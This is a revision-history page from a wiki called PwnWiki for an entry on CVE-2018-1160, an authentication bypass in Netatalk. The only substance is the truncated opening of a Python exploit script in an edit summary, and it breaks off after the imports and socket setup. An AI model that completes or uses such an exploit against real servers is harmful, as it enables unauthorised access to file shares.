Revision history of "CVE-2018-1160 Netatalk 身份驗證繞過漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 09:16, 11 April 2021Pwnwiki talk contribs 1,749 bytes +1,749 Created page with "==EXP== <pre> import socket import struct import sys if len(sys.argv) != 3: sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) sock = socket.socket(socket.AF_INET, socke..."